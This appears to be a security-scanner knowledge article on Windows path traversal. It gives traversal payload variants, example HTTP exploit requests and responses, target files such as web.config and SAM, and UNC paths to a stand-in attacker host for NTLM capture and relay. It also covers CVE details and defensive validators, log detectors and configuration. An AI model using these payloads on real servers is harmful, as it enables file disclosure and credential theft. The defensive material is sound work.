Uses Windows-specific traversal sequences (..\ or ../) and alternate encodings to traverse directories on Windows server filesystems.
TL;DR

- / and \ both work as directory separators, doubling the encoding surface compared with Linux.
- \\attacker\share in a user-controlled path makes the server process authenticate to the attacker over SMB (NTLM capture or relay).
- The ..;/ path parameter bypass (CVE-2025-55752) evades WAF rules that only look for ../.
- Fix with canonicalization plus a prefix check (getCanonicalPath() in Java, Path.GetFullPath() in .NET), not by rewriting backslashes.

Windows path traversal (CWE-22) exploits Windows-specific filesystem semantics that create a wider attack surface than Linux path traversal. Windows accepts both forward slash / and backslash \ as directory separators. Win32 APIs normalize path separators, expand environment variables, handle 8.3 short filename aliases, and process UNC paths; each of these creates a bypass vector that does not exist on Unix systems.
Under OWASP A01:2021, Windows path traversal most commonly targets IIS web servers, ASP.NET applications, and PHP-CGI configurations on Windows. The vulnerability class gained renewed attention in 2024 with CVE-2024-4577 (PHP-CGI Windows argument injection, CVSS 9.8, exploited by TellYouThePass ransomware within 48 hours) and the Apache Tomcat TOCTOU chain (CVE-2024-50379, CVSS 9.8) on case-insensitive NTFS filesystems.
The primary distinction from Linux traversal is the encoding surface: a Linux-centric filter that blocks / traversal may pass \ traversal, and vice versa. A thorough Windows traversal test must cover both separators, their encoded forms, and Windows-specific path constructs including UNC paths, Alternate Data Streams, 8.3 filename aliases, and Tomcat path parameter syntax.
Windows resolves .. segments regardless of whether they use / or \:

```http
GET /download?file=..\..\..\..\Windows\win.ini HTTP/1.1
Host: iis-server.example.com
```

```http
HTTP/1.1 200 OK
Content-Type: application/octet-stream

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

```http
GET /download?file=..%5c..%5c..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: iis-server.example.com
```

```http
HTTP/1.1 200 OK

; for 16-bit app support
[fonts]
```

The %5c encoding of the backslash evades filters that look for a literal \, and it also gets past Linux-oriented filters that only look for / or %2f.
Payload variants to test:

- Literal backslash: ..\..\..\..\Windows\win.ini
- Encoded backslash: ..%5c..%5c..%5cWindows%5cwin.ini
- Mixed separators: ../\../\..\Windows/win.ini
- Double-encoded: ..%255c..%255c..%255cWindows%255cwin.ini
- Mixed slash-backslash: ..%2f..%5c..%2f..%5cWindows%5cwin.ini
- Tomcat path params: ..;/..;/..;/..;/Windows/win.ini

Windows UNC paths trigger outbound network connections from the server:
```http
GET /download?file=\\attacker.com\share\file.txt HTTP/1.1
Host: windows-server.example.com
```

The Windows server opens an SMB connection to attacker.com to resolve the UNC path and authenticates as the account the server process runs under (the machine account for the default IIS application pool identities, or a configured service account). What leaks is the NTLM challenge-response (Net-NTLMv2), not the NT hash itself: it can be captured with Responder and cracked offline, or relayed with Impacket's ntlmrelayx to internal systems that do not enforce SMB signing, giving the attacker lateral movement as that account.
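The following is an added example, not code from this page or from BreachVex. It shows a Windows-aware validator that runs the payload variants listed above through percent-decoding, Tomcat path-parameter stripping and ntpath normalization, and rejects the UNC, drive-letter, alternate-data-stream, 8.3 short-name and device-name constructs the page describes, next to a naive Linux-style filter for comparison. The base directory, the naive filter and the payload list are assumptions for the demo; ntpath lets it run on any OS, but real 8.3 alias resolution needs the Win32 API (GetLongPathNameW), which is why the validator simply refuses names containing ~.

```python
import ntpath
import re
from urllib.parse import unquote

# Assumed web root for the example (not from the page).
BASE_DIR = r"C:\inetpub\wwwroot\uploads"

# Reserved DOS device names: a component named CON, NUL, COM1... (even with an
# extension such as nul.txt) refers to a device, not a file on disk.
RESERVED = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def linux_style_filter(raw: str) -> bool:
    """Naive filter that only knows forward-slash traversal. True means blocked."""
    lowered = raw.lower()
    return "../" in lowered or "%2f" in lowered


def decode_fully(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (catches %255c)."""
    cur = raw
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def strip_path_params(path: str) -> str:
    """Drop Tomcat-style ';param' from every segment, so '..;/' becomes '../'."""
    return re.sub(r";[^/\\]*", "", path)


def classify(user_input: str) -> str:
    """Return 'allowed' or the reason the input is rejected."""
    decoded = strip_path_params(decode_fully(user_input))

    # UNC (\\host\share or //host/share) would make the server authenticate over SMB.
    if decoded.startswith(("\\\\", "//")):
        return "unc"
    # Drive-letter absolute path (C:\..., D:...).
    if re.match(r"^[A-Za-z]:", decoded):
        return "drive"
    # Any remaining colon can only be an NTFS stream specifier (file::$DATA, file:stream).
    if ":" in decoded:
        return "ads"
    for component in re.split(r"[\\/]", decoded):
        if component.split(".")[0].upper() in RESERVED:
            return "device"
        # 8.3 aliases (PROGRA~1) bypass name-based filters; resolving them needs
        # GetLongPathNameW on a real Windows host, so reject them outright here.
        if "~" in component:
            return "short-name"

    # ntpath collapses both separators and '..' regardless of the host OS.
    resolved = ntpath.normpath(ntpath.join(BASE_DIR, decoded))
    inside = resolved.lower().startswith((BASE_DIR + "\\").lower())
    return "allowed" if inside else "traversal"


# Payload variants from the page plus one benign request (constructed list).
PAYLOADS = [
    r"..\..\..\..\Windows\win.ini",
    "..%5c..%5c..%5c..%5cWindows%5cwin.ini",
    r"../\../\..\Windows/win.ini",
    "..%255c..%255c..%255cWindows%255cwin.ini",
    "..;/..;/..;/..;/Windows/win.ini",
    r"\\attacker.com\share\file.txt",
    "%5C%5Cattacker-server/path",
    "report.pdf::$DATA",
    r"PROGRA~1\secret.txt",
    "nul.txt",
    "reports/2024/q1.pdf",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p:45} linux_filter_blocks={linux_style_filter(p)!s:5} verdict={classify(p)}")
```

Running it side by side shows the gap the page describes: the Linux-style filter lets every backslash, double-encoded and ..;/ variant through, while the Windows-aware path resolves each of them outside BASE_DIR. The order of checks matters: UNC and drive-letter input is rejected before anything is joined to the base directory, because joining a rooted path discards the base, and the prefix check uses BASE_DIR with a trailing separator so that a sibling directory such as uploads2 does not pass.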
NTFS supports named streams on files, allowing multiple data forks under one filename:

```http
GET /files/report.pdf::$DATA HTTP/1.1
GET /config/web.config::$DATA HTTP/1.1
```

The ::$DATA suffix names the default (unnamed) data stream, so file.asp::$DATA refers to the same bytes as file.asp. Some IIS configurations and older ASP applications failed to strip this stream specifier before selecting a handler: the extension no longer matched the script mapping, and the response returned the raw source rather than executing the file.
```http
GET /login.asp::$DATA HTTP/1.1
Host: legacy-iis.example.com
```

```http
HTTP/1.1 200 OK
Content-Type: text/html

<%
Dim strConn
strConn = "Provider=SQLOLEDB;Data Source=db-server;..." & _
"User ID=webapp;Password=S3cr3tDB!"
%>
```

| Variant | Payload | Target | Impact |
|---|---|---|---|
| Backslash traversal | ..\..\Windows\win.ini | Any Windows app | Filesystem access confirmation |
| Encoded backslash | ..%5c..%5cWindows%5cwin.ini | Linux-only filter bypass | Same as above, evades / filter |
| web.config read | ..\..\inetpub\wwwroot\web.config | IIS/ASP.NET | DB connection strings, app secrets |
| SAM backup | ..\..\Windows\repair\SAM | Admin-accessible servers | NT password hashes |
| UNC injection | \\attacker\share\trigger | Windows SMB stack | NTLM hash capture, relay |
| ADS bypass | file.asp::$DATA | Legacy IIS | ASP source code disclosure |
| 8.3 alias | PROGRA~1\secret.txt | Long-path filters | Short name alias bypass |
| Tomcat ..;/ | ..;/..;/WEB-INF/web.xml | Tomcat path parameter | WAF bypass, web.xml read |
| File | Confirmation Marker | Impact |
|---|---|---|
| C:\Windows\win.ini | [fonts], [extensions] | Filesystem access confirmation |
| C:\inetpub\wwwroot\web.config | <connectionStrings>, <appSettings> | DB credentials, API keys, auth secrets |
| C:\Windows\System32\drivers\etc\hosts | 127.0.0.1 localhost | Internal hostname enumeration |
| C:\Windows\repair\SAM | Binary (NT hash format) | Offline NT hash cracking |
| C:\inetpub\logs\LogFiles\W3SVC1\*.log | W3C log header (#Software: Microsoft Internet Information Services, #Fields:) | Log poisoning for ASP/ASP.NET RCE |
| C:\Program Files\app\config.xml | Application-specific | App-specific credential files |
CVE-2024-4577 — PHP-CGI Windows Best-Fit Argument Injection (CVSS 9.8): Discovered by Devcore in June 2024. When Windows converts a string to a legacy code page that has no exact match for a character, it applies "Best-Fit" mapping; under certain locales (Japanese cp932, Simplified Chinese cp936, Traditional Chinese cp950) the Soft Hyphen U+00AD is mapped to Hyphen-Minus 0x2D. PHP-CGI's guard from the CVE-2012-1823 fix rejects a leading 0x2D in the decoded query string but does not recognise 0xAD, so the check passes; the Win32 code-page conversion then turns 0xAD into 0x2D before PHP-CGI's option parser runs. Attackers therefore send a query string with %AD in place of - to inject PHP-CGI options such as -d allow_url_include=1 -d auto_prepend_file=php://input, which makes PHP execute the request body: unauthenticated RCE with no file traversal at all. TellYouThePass ransomware, Gh0st RAT and RedTail cryptominers weaponized the vulnerability within 48 hours of disclosure, and CISA added it to the KEV catalog. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
CVE-2024-50379 — Apache Tomcat TOCTOU on Windows (CVSS 9.8): When the default servlet is configured with readonly="false" (uploads via PUT enabled) on a case-insensitive filesystem such as NTFS, Tomcat's check that an uploaded file is not a JSP and its later use of that file race each other. An attacker uploads content under a name that differs from a .jsp name only by case (for example test.Jsp) while concurrently requesting test.jsp; under load the case-sensitivity check is bypassed and the uploaded content is compiled and executed as a JSP. The fix shipped in Tomcat 11.0.2, 10.1.34 and 9.0.98, and CVE-2024-56337 followed days later to record that the fix is incomplete on Java 8 and 11 unless the JVM system property sun.io.useCanonCaches is set to false (it already defaults to false on Java 12 and later), a requirement the initial advisory did not state.
CVE-2024-38472 — Apache HTTP Server UNC Path Coercion (Windows): Part of Orange Tsai's "Confusion Attacks" cluster presented at DEF CON 32 and fixed in httpd 2.4.60. Apache's apr_filepath_merge() function on Windows failed to reject UNC path prefixes in URI components. An attacker sent %5C%5Cattacker-server/path in a request URI, causing Apache to initiate an outbound SMB connection to attacker-server, which leaked the server's NTLM credentials and enabled relay attacks. CVSS 7.5.
Testing checklist:

- Literal backslash: ..\..\..\..\Windows\win.ini. Confirm with [fonts] in the response.
- Encoded backslash: ..%5c..%5c..%5cWindows%5cwin.ini.
- Mixed separators: ../\../\..\Windows/win.ini.
- web.config access: ..\..\inetpub\wwwroot\web.config. Confirm with <connectionStrings> or <appSettings>.
- Tomcat path parameters: ..;/..;/..;/WEB-INF/web.xml.
- Alternate Data Streams: append ::$DATA to .asp, .aspx, or .config file paths.
- UNC coercion: \\attacker-controlled-host\test in the path parameter triggers an outbound SMB connection (use Responder in listener mode).

BreachVex includes Windows-specific payload variants: ..%5c..%5c..%5c (encoded backslash), ..\..\..\..\Windows\win.ini (literal backslash), and ..;/..;/..;/..;/..;/..;/..;/ (Tomcat path parameter bypass, CVE-2025-55752). Windows file markers ([fonts] for win.ini, <connectionStrings> for web.config) are in the content gate. UNC path injection testing requires network capture setup outside the standard scan flow.
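The checklist above is what a tester sends; the defender's counterpart is spotting the same variants in server logs. The following is an added example, not code from this page or from BreachVex: it parses IIS W3C extended log lines and tags each request with the Windows-traversal indicators it contains (backslash and double-encoded traversal, Tomcat ..;/ path parameters, UNC values, ::$DATA stream specifiers, and a lone %AD soft hyphen of the kind used against PHP-CGI in CVE-2024-4577). The log lines are constructed for the demo, and the soft-hyphen rule is a heuristic that ignores %AD when it is a UTF-8 continuation byte.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C extended log lines for the demo (not from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
2025-01-10 12:00:01 GET /download file=report.pdf 200 10.0.0.5
2025-01-10 12:00:02 GET /download file=..%5c..%5c..%5c..%5cWindows%5cwin.ini 200 198.51.100.7
2025-01-10 12:00:03 GET /download file=..%255c..%255cWindows%255cwin.ini 200 198.51.100.7
2025-01-10 12:00:04 GET /download file=%5c%5cattacker.example%5cshare%5ct.txt 500 198.51.100.7
2025-01-10 12:00:05 GET /login.asp::$DATA - 200 198.51.100.7
2025-01-10 12:00:06 GET /..;/..;/WEB-INF/web.xml - 404 198.51.100.7
2025-01-10 12:00:07 GET /images/logo.png - 200 10.0.0.9
"""

# %AD not preceded by another high-byte escape: a lone soft hyphen rather than a
# UTF-8 continuation byte (caf%C3%A9 style text is left alone). Heuristic only.
SOFT_HYPHEN = re.compile(r"(?<!%[89a-f][0-9a-f])%ad", re.IGNORECASE)


def flag_request(uri_stem: str, query: str) -> list[str]:
    """Return the list of Windows-traversal indicators found in one request."""
    raw = uri_stem if query == "-" else f"{uri_stem}?{query}"
    once = unquote(raw)
    decoded = unquote(once)  # second round exposes %255c
    tags = []
    if "%25" in raw.lower() and decoded != once:
        tags.append("double-encoded")
    if "..;" in decoded:
        tags.append("tomcat-path-param")
    # Strip ;param from each segment the way Tomcat does before matching '..'.
    normalized = re.sub(r";[^/\\?]*", "", decoded)
    if re.search(r"(?:^|[\\/=])\.\.[\\/]", normalized):
        tags.append("traversal")
    # A parameter value that starts with \\ or // is a UNC reference.
    if re.search(r"(?:^|=)(?:\\\\|//)[A-Za-z0-9]", normalized):
        tags.append("unc")
    if re.search(r"::\$[A-Za-z]+", normalized, re.IGNORECASE):
        tags.append("ads")
    if SOFT_HYPHEN.search(raw):
        tags.append("soft-hyphen")
    return tags


def scan_log(text: str) -> list[dict]:
    """Parse W3C extended log text and return the flagged requests in order."""
    fields: list[str] = []
    hits = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; a real pipeline should count these
        rec = dict(zip(fields, parts))
        tags = flag_request(rec["cs-uri-stem"], rec["cs-uri-query"])
        if tags:
            hits.append({"time": rec["time"], "c-ip": rec["c-ip"],
                         "uri": rec["cs-uri-stem"], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["c-ip"], hit["uri"], ",".join(hit["tags"]))
```

Two details carry the weight here. Decoding twice before matching is what makes ..%255c visible, and stripping ;-delimited path parameters before looking for .. is what makes the Tomcat variant visible; a rule that matches the literal ../ on the raw request line misses both. The IIS status code is deliberately not used as a signal: the UNC request in the sample returned 500, but the outbound SMB connection and the NTLM exchange happened regardless.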
```csharp
// C# / ASP.NET: Path.GetFullPath normalizes both / and \ and resolves ..
using System;
using System.IO;

public static class SafeFileReader
{
    // The trailing separator matters: without it C:\inetpub\wwwroot\uploads2\
    // would also pass the StartsWith check below.
    private static readonly string BASE_DIR =
        Path.GetFullPath(@"C:\inetpub\wwwroot\uploads\");

    public static byte[] SafeReadFile(string userInput)
    {
        // GetFullPath resolves both / and \ separators and .. sequences.
        // If userInput is rooted (C:\..., \\server\share), Path.Combine discards
        // BASE_DIR, so the prefix check still rejects it; reject UNC and drive
        // letters up front anyway (see ValidateInputNotUNC below).
        string resolved = Path.GetFullPath(Path.Combine(BASE_DIR, userInput));

        // GetFullPath does not change letter case and NTFS is case-insensitive,
        // so the comparison must be case-insensitive too.
        if (!resolved.StartsWith(BASE_DIR, StringComparison.OrdinalIgnoreCase))
        {
            throw new UnauthorizedAccessException("Path traversal blocked");
        }
        return File.ReadAllBytes(resolved);
    }
}
```

```java
// Java on Windows: getCanonicalFile handles both separators
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;

public class SafeDownload {
    public byte[] safeDownload(String userInput) throws IOException {
        File base = new File("C:\\inetpub\\wwwroot\\uploads\\").getCanonicalFile();
        // Reject UNC and drive-letter input before canonicalizing: getCanonicalFile
        // touches the filesystem and would resolve \\attacker\share over SMB itself.
        if (userInput.startsWith("\\\\") || userInput.startsWith("//")
                || (userInput.length() >= 2 && userInput.charAt(1) == ':')) {
            throw new SecurityException("UNC and drive-letter paths are not permitted");
        }
        File requested = new File(base, userInput).getCanonicalFile();
        // Path.startsWith compares whole path components, not string prefixes,
        // so uploads2 does not match uploads; on Windows it is case-insensitive.
        if (!requested.toPath().startsWith(base.toPath())) {
            throw new SecurityException("Path traversal attempt blocked");
        }
        return Files.readAllBytes(requested.toPath());
    }
}
```

On Windows, path comparison must be case-insensitive. A filter that rejects C:\Windows\win.ini but passes c:\windows\win.ini is bypassed by case variation. Path.GetFullPath in .NET does not alter case, so compare with StringComparison.OrdinalIgnoreCase. Java's getCanonicalFile on Windows rewrites existing path components to their on-disk case, and java.nio.file.Path comparisons (startsWith, equals) are case-insensitive on Windows; if you fall back to plain string comparison, use equalsIgnoreCase.
```csharp
// Explicitly reject UNC paths and Windows drive letters in user input,
// before any Path.Combine or Path.GetFullPath call.
using System;

private static void ValidateInputNotUNC(string userInput)
{
    // \\server\share and //server/share both resolve as UNC on Windows
    if (userInput.StartsWith(@"\\") || userInput.StartsWith(@"//"))
        throw new ArgumentException("UNC paths are not permitted");
    // Reject drive letters (C:, D:, etc.)
    if (userInput.Length >= 2 && userInput[1] == ':')
        throw new ArgumentException("Drive letter paths are not permitted");
}
```

In IIS, keep allowDoubleEscaping="false" (the default since IIS 7) so that requests still containing percent-escapes after one round of decoding, such as %255c, are rejected rather than decoded twice, and add request filtering denyStrings entries so that the :: stream specifier never reaches the application:
```xml
<!-- web.config: IIS request filtering -->
<system.webServer>
  <security>
    <requestFiltering allowDoubleEscaping="false">
      <denyStrings>
        <add string="::" />
        <add string="%3a%3a" />
      </denyStrings>
    </requestFiltering>
  </security>
</system.webServer>
```

The Tomcat ..;/ path parameter bypass (CVE-2025-55752) is fixed by upgrading to the patched Tomcat release. WAF rules that only check for ../ miss this variant, so any rule or reverse proxy in front of Tomcat must strip ;-delimited path parameters from each segment before normalizing and matching, which is what Tomcat itself does internally. In server.xml keep allowBackslash="false" on the Connector (the default) so Tomcat does not also treat \ as a separator; rejectIllegalHeader controls HTTP header parsing and is not a path-traversal mitigation.
Windows accepts both / and \ as path separators, creating twice the encoding surface. Windows also supports UNC paths (\\server\share), Alternate Data Streams (file.txt::$DATA), 8.3 short filename aliases (PROGRA~1 for Program Files), and reserved device names (CON, NUL, PRN). Each of these creates bypass vectors that do not exist on Linux systems.
C:\Windows\win.ini confirms filesystem access (marker: [fonts]). C:\inetpub\wwwroot\web.config exposes ASP.NET connection strings and application secrets. C:\Windows\System32\drivers\etc\hosts reveals internal DNS mappings. C:\Windows\repair\SAM (and the VSS shadow copy equivalent) contains backup NT password hashes. IIS log files in C:\inetpub\logs\LogFiles\W3SVC1\ can be used for log poisoning on Windows if ASP/ASP.NET execution is available.
CVE-2024-4577 (CVSS 9.8, PHP-CGI on Windows) exploits Windows Best-Fit character mapping: under certain locales (Japanese, Simplified Chinese, Traditional Chinese) the Soft Hyphen U+00AD is mapped to Hyphen-Minus 0x2D when the code-page conversion has no exact match. PHP-CGI's hyphen check from the CVE-2012-1823 fix does not recognise 0xAD, but after the Best-Fit conversion the option parser sees a real -. This allows injection of PHP-CGI arguments such as -d allow_url_include=1 -d auto_prepend_file=php://input, achieving RCE. It is classified as an argument injection via Windows encoding normalization rather than a path traversal.
CVE-2024-50379 (CVSS 9.8) is a TOCTOU (time-of-check to time-of-use) race in Apache Tomcat on case-insensitive filesystems such as Windows NTFS, reachable only when the default servlet allows writes (readonly="false"). Tomcat checks a filename's case and extension at one moment and uses the file at another; an attacker uploads content under a name that differs from a .jsp name only by case while concurrently requesting the .jsp name, and under load the upload is compiled and executed as a JSP. CVE-2024-56337 records that the fix is incomplete on Java 8 and 11 unless the JVM system property sun.io.useCanonCaches is set to false.
The Tomcat path parameter bypass CVE-2025-55752 relies on Tomcat treating ; in a URL segment as the start of a path parameter (the same mechanism behind ;jsessionid=...) and stripping it before normalizing the path. The request path /..;/..;/..;/admin/config therefore becomes /../../../admin/config inside Tomcat. A WAF or reverse proxy that normalizes first, or only matches the literal ../, never sees the traversal because it does not account for Tomcat's path parameter syntax.
Universal Naming Convention (UNC) paths begin with \\server\share and reference files on remote Windows file shares. An application that passes user-supplied paths to Windows filesystem APIs without filtering UNC prefixes makes the server authenticate to the attacker-controlled host (\\attacker\share) over SMB, leaking the NTLM challenge-response of the account the service runs under. This converts a path traversal vulnerability into a credential theft or relay attack.
Windows NTFS supports named data streams on files. Every file has a default stream ($DATA) plus optional named streams. The syntax file.txt::$DATA reads the raw file content. An attacker who can specify ::$DATA appended to a filename may bypass extension-based content type checks — some filters check the extension before ::$DATA and do not account for the stream specifier. This can serve as an extension bypass on IIS-hosted applications.
BreachVex includes Windows-specific payloads in its extended LFI prover: ..%5c..%5c..%5c (backslash encoded), ..\..\..\Windows\win.ini (literal backslash), and mixed slash/backslash sequences. Windows file confirmation uses markers: [fonts] or [extensions] for win.ini, <connectionStrings> for web.config. The Tomcat ..;/ pattern is also in the payload set (CVE-2025-55752).